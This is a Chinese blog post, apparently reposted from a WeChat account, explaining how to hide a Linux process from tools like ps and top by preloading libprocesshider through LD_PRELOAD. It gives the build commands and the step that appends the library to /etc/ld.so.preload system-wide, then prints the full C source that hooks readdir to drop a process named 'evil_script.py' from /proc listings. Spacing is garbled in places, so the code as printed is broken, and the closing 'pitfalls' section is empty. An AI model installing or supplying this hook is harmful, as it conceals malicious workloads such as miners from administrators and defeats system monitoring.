linux隐藏进程的一种方法 前言 1. 本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下载 2. 思路就是利用 LD_PRELOAD 来实现系统函数的劫持 LD_PRELOAD是什么:
LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的
实现
localhost:~# git clone https://github.com/gianlucaborello/libprocesshider.git Cloninginto 'libprocesshider'... remote: Counting objects: 26, done. remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26 Unpackingobjects: 100% (26/26), done. localhost:~# cd libprocesshider/ localhost:~/libprocesshider# make gcc-Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl localhost:~/libprocesshider# 2. 移动文件到/usr/local/lib/目录下 mv libprocesshider.so /usr/local/lib/ 3. 把它加载到全局动态连接局 echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload 测试
此时我们发现 cpu 100%,但是却找不到任何占用cpu高的程序 分析 #define _GNU_SOURCE
#include<stdio.h> #include<dlfcn.h> #include<dirent.h> #include<string.h> #include<unistd.h>
/* * Every process with this name will be excluded */ staticconstchar* process_to_filter = "evil_script.py";
/* * Get a directory name given a DIR* handle */ staticintget_dir_name(DIR* dirp, char* buf, size_t size) { int fd = dirfd(dirp); if(fd == -1) { return0; }
char tmp[64]; snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd); ssize_t ret = readlink(tmp, buf, size); if(ret == -1) { return0; }
buf[ret] = 0; return1; }
/* * Get a process name given its pid */ staticintget_process_name(char* pid, char* buf) { if(strspn(pid, "0123456789") != strlen(pid)) { return0; }
char tmp[256]; snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
FILE* f = fopen(tmp, "r"); if(f == NULL) { return0; }
if(fgets(tmp, sizeof(tmp), f) == NULL) { fclose(f); return0; }
fclose(f);
int unused; sscanf(tmp, "%d (%[^)]s", &unused, buf); return1; }
#define DECLARE_READDIR(dirent, readdir) \ static struct dirent* (*original_##readdir)(DIR*) = NULL; \ \ struct dirent* readdir(DIR *dirp) \ { \ if(original_##readdir == NULL) { \ original_##readdir = dlsym(RTLD_NEXT, "readdir"); \ if(original_##readdir == NULL) \ { \ fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \ } \ } \ \ struct dirent* dir; \ \ while(1) \ { \ dir = original_##readdir(dirp); \ if(dir) { \ char dir_name[256]; \ char process_name[256]; \ if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \ strcmp(dir_name, "/proc") == 0 && \ get_process_name(dir->d_name, process_name) && \ strcmp(process_name, process_to_filter) == 0) { \ continue; \ } \ } \ break; \ } \ return dir; \ }
DECLARE_READDIR(dirent64, readdir64); DECLARE_READDIR(dirent, readdir);
遇到的坑
---------------------------------------------------------------------------------------------------------------------- 我们尊重原创,也注重分享,文章来源于微信公众号:网络安全屋,建议关注公众号查看原文。如若侵权请联系qter@qter.org。 ---------------------------------------------------------------------------------------------------------------------- |